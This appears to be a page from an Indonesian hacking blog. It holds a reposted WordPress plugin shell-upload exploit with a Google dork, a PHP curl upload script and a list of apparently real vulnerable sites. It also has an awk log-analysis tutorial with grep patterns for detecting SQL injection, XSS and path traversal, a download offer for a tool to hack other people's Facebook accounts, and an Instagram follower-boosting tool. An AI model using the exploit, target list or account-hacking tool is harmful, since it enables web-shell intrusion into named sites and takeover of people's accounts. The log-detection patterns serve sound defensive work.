BREAKING NEWS

WordPress Page Flip Image Gallery Shell Upload

WordPress Page Flip Image Gallery Shell Upload


WordPress Page Flip Image Gallery Shell Upload
WordPress Page Flip Image Gallery Shell Upload


WordPress Page Flip Image Gallery Shell Upload


Dork: inurl:/wp-content/plugins/page-flip-image-gallery/

###############################################################
# Exploit Title: Wordpress page-flip-image-gallery plugins Remote File
Upload Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/06/2013
# Vendor Homepage: http://pageflipgallery.com
# Software Link :
http://downloads.wordpress.org/plugin/page-flip-image-gallery.zip
# Google dork: inurl:/wp-content/plugins/page-flip-image-gallery/
# Tested on: Windows/Linux
###############################################################

1)Exploit :
= = = = = =

<?php
$uploadfile="file.php";
$ch = curl_init("
http://127.0.0.1/wp-content/plugins/page-flip-image-gallery/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>

2) Exploit demo :
= = = = = = = = =
http://arcticpackaging.com/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.panvelkargroup.org/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.jamma.it/wp-content/plugins/page-flip-image-gallery/upload.php
http://www.icipici.ie/suiomh/wp-content/plugins/page-flip-image-gallery/upload.php
# #### #### #### #### #### #### #### #### #

 http://[Target]/wp-content/uploads/file.php

# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share
>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti
>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
// Why So Serious...

TUTORIAL BERMAIN DENGAN PERINTAH AWK

BERMAIN DENGAN PERINTAH AWK


"Awk" adalah sebuah perintah pada Linux / Unix yang mempunyai kegunaan untuk mem-parsing atau mengurai sebuah file. Hampir mirip dengan "grep", namun bedanya grep digunakan ketika kita akan mem-filter sebuah isi direktori dengan sebuah ketentuan. awk paling sering digunakan untuk me-scan dan memproses sebuah pola. Pencarian pada sebuah file yang cocok dengan pola yang dibuat lalu menyaring pencarian tersebut kedalam sebuah file baru. 




Berikut ini adalah fitur-fitur yang dimiliki Awk : 

-Awk menjadikan text file sebagai records dan fields 
-Seperti bahasa pemrograman lainnya, Awk mengandung variabel, kondisi, dan looping 
-Awk mempunyai operator aritmatika dan string 
-Awk bisa digenerate menjadi laporan yang berformat 

contoh perintah default:
pertama kita buat file txt dengan nama terserah,disini saya menggunakan nama listhutang.txt dengan isi sebagai berikut:
Code:1 sony 200000 2 nicolas 3000003 amin 500004 yoga 100005 mizan 85000

berikut contoh perintah dan hasilnya: 
Code:pandora@pandorabox:~/awk$ awk '{print;}' listhutang.txt1 sony 200000 2 nicolas 3000003 amin 500004 yoga 100005 mizan 85000

contoh perintah menampilkan baris tertentu:
Code:pandora@pandorabox:~/awk$ awk '/sony/' listhutang.txt1 sony 200000

contoh perintah menampilkan field tertentu:
Code:pandora@pandorabox:~/awk$ awk '{print $2,$3}' listhutang.txtsony 200000 nicolas 300000amin 50000yoga 10000mizan 85000

contoh perintah menampilkan jumlah paling banyak/terkecil berdasarkan field ke 3: 
Code:pandora@pandorabox:~/awk$ awk '{$3>90000}' listhutang.txt1 sony 200000 2 nicolas 300000

contoh inisialisasi dan final action:
Awk memiliki 2 pola penting yang dibuat spesifik berdasarkan kata kunci yang disebut BEGIN dan END.

Syntax: 
Code:BEGIN { Actions}{ACTION} # Action for everyline in a fileEND { Actions }

# is for comments in Awk
contoh:
Code:pandora@pandorabox:~/awk$ awk 'BEGIN {print "no\tnama\tjumlah";}>{print $1,"\t",$2,"\t",$3,"\t";}>END {print "----------------------">}'  listhutang.txt

untuk contoh pengembangan awk saya kasih contoh mengabungkan perintah awk dan grep untuk menganalisa file httpd.log pada sebuah server untuk membuat report tertentu:

pertama kita lihat format file yang akan kita proses
kira-kira format dari file httpd.log ini adalah:
Code:1   2 3        4              5           6                     7            8                     9ip  -  -  Date/time    timezone  Request type  Req content http response     size

Contoh mencari serangan sqli:

pertama kita masukan file httpd.log ke folder “workshop/sql” 
lalu kita masuk ke dalam folder yang telah ditentukan dengan perintah “cd workshop/sql”
setelah masuk kita masukkan perintah di terminal :

Code:pandora@pandorabox:~/workshop/sql$ for file in $(ls ~/workshop/sql); do awk '{print $1, $4, $6, $7}' $file |grep GET| grep -E "SELECT|UNION|select|union" > $file"_sqli_report.txt"; done


Contoh mencari serangan sqli:
pertama kita masukan file httpd.log ke folder “workshop/sql” 
lalu kita masuk ke dalam folder yang telah ditentukan dengan perintah “cd workshop/sql”
setelah masuk kita masukkan perintah di terminal :

Code:pandora@pandorabox:~/workshop/sql$ for file in $(ls ~/workshop/sql); do awk '{print $1, $4, $6, $7}' $file |grep GET| grep -E "SELECT|UNION|select|union" > $file"_sqli_report.txt"; done

keterangan:

script ini berarti list semua file dalam folder "~/workshop/sql" kemudian parse dengan awk dan ambil informasi yang diperlukan dimana $1 adalah ip address, $4 adalah DateTime, $6 adalah Request Type dan $7 adalah Request Content kemudian filter baris yang mengandung kata2 GET dan filter sekali lagi baris yang mengandung kata-kata select atau union yang mana merupakan kata-kata yang biasa digunakan dalam melakukan sql injection. lakukan parse dan filter pada setiap file yang dtemukan pada folder "~/workshop/sql" sampai habis. Lalu hasilnya dimasukan ke dalam nama yang diproses ditambah dengan imbuhan “_sqli_report.txt”(httpd.log_sqli_report.txt)

Contoh mencari serangan xss:

pertama kita masukan file httpd.log ke folder “workshop/xss” 

lalu kita masuk ke dalam folder yang telah ditentukan dengan perintah “cd workshop/xss”
setelah masuk kita masukkan perintah di terminal :

Code:for file in $(ls ~/workshop/xss); do awk '{print $1, $4, $6, $7}' $file |grep GET| grep -E "javascript" > $file"_xss_report.txt"; done

keterangan:

script ini berarti list semua file dalam folder "~/workshop/xss" kemudian parse dengan awk dan ambil informasi yang diperlukan dimana $1 adalah ip address, $4 adalah DateTime, $6 adalah Request Type dan $7 adalah Request Content kemudian filter baris yang mengandung kata-kata GET dan filter sekali lagi baris yang mengandung kata-kata javascript yang mana salah satu ciri serangan xss. lakukan parse dan filter pada setiap file yang dtemukan pada folder "~/workshop/xss" sampai habis. Lalu hasilnya dimasukan ke dalam nama yang diproses ditambah dengan imbuhan “_sqli_report.txt”(httpd.log_xss_report.txt)

Contoh mencari serangan directory jumping:

pertama kita masukan file httpd.log ke folder “workshop/dirjump” 
lalu kita masuk ke dalam folder yang telah ditentukan dengan perintah “cd workshop/dirjump”
setelah masuk kita masukkan perintah di terminal :

Code:for file in $(ls ~/workshop/dirjump); do awk '{print $1, $4, $6, $7}' "$file" |grep GET| grep -E "/etc|cmd.exe" > $file"_dirjump_report.txt"; done

keterangan:
Dengan script ini, bias dilakukan automatisasi pembuatan report tentang adanya directory jumping dari apache log. Script ini berarti list semua file dalam folder "~/workshop/dirjump" kemudian parse dengan awk dan ambil informasi yang diperlukan dimana $1 adalah ip address, $4 adalah DateTime, $6 adalah Request Type dan $7 adalah Request Content kemudian filter baris yang mengandung kata-kata GET dan filter sekali lagi baris yang mengandung /etc atau cmd.exe karena biasanya file-file yang dicari ada di folder /etc atau bisa diakses dengan cmd.exe.

Kita juga dapat melakukan pencacahan tentang ip mana yang melakukan jenis serangan sql injection/serangan yg lain dengan script/perintah berikut:

Code:for file in $(ls ~/workshop/sqli_report); do awk '{print $1}' $file |sort|uniq -c|sort -n > $file"_stats.txt"; done

contoh menganalisis file secure.log

kita pertama-tama mencari log ssh yang berhasil login menggunakan script berikut ini
Code:cat secure.log | sort | grep 'Accepted' | awk '{print $1 " " $2 " " $3 " User: " $9 " IP:" $11 }' > "ssh_log_success.txt"

lalu mencari log ssh yang gagal login dengan menggunakan script berikut ini
Code:cat secure.log | sort | grep 'Failed' | awk '{print $1 " " $2 " " $3 " User: " $9 " IP:" $11 }' > "ssh_log_success.txt"

disini saya sertakan juga file httpd.log dan secure.log buat latihan .file nya bisa di download disini :d

kalo tutorialnya berkenan mungkin bisa bagi yang ijo2 nya Smile)Smile)

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share
>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti
>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
// Why So Serious...

Download Tools Hack Akun Facebook 2018 Free

Download Tools Hack Akun Facebook 2018 Free


Download Tools Hack Facebook 2018 Free
Download Tools Hack Facebook 2018 Free


Selamat datang di blog sederhana ini, kali ini akan share tools untuk Hack Facebook orang lain dengan cara yang sangat mudah, harap gunakan tools ini dengan baik, saya tidak bertanggung jawab apapun yg akan terjadi nantinya.


Features

Ya gitulahhh, anak it pasti taulah.

Password LoginApp [ www.maniak-wifi.web.id ]

ScreenShoot

Ini adalah cuplikan gambar dari Tools Ini.

Download Tools Hack Facebook 2018 Free
Download Tools Hack Facebook 2018 Free

Download Tools Hack Facebook 2018 Free
Download Tools Hack Facebook 2018 Free

Download Tools Hack Facebook 2018 Free
Download Tools Hack Facebook 2018 Free

Semoga Bermanfaat.
Budayakan membaca, dan lebih teliti lagi ...
jangan salahin saya kalau terjadi hal-hal yg tidak di inginkan.


Download
[ Mediafire ] [ ZippyShare ] [ Google Drive ] [ Box ]
Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share
>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti
>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
// Why So Serious...

Tools Boost Follower and Liker For Instagram 2018 Free

Tools Boost Follower and Liker For Instagram 2018 Free


Selamat Siang para pecinta dunia maya, oke kali ini gw mau share tools yang aduhay untuk perkembangan dunia maya yg sangat - sangat mengerikan, ini adalah tools Boost Follower and Liker yang bakal buat instagramu kebanjiran, hhohoo

ScreenShoot

Ini cuplikan dari Tools Instagram Good Tools V2

Tools Boost Follower and Liker For Instagram 2018 Free
Tools Boost Follower and Liker For Instagram 2018 Free

Features


  • Boost Follower
  • Boost Liker


Link Downloads ada dibawah ini, Semoga bermanfaat.
Budayakan Membaca, jangan salahin gw nnti kalau ada apa-apa.


Download
[ Mediafire ] [ ZippyShare ] [ Google Drive ] [ Box ]
Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share
>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti
>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
// Why So Serious...
 
Copyright © 2014 Abdur Rozak. Designed by OddThemes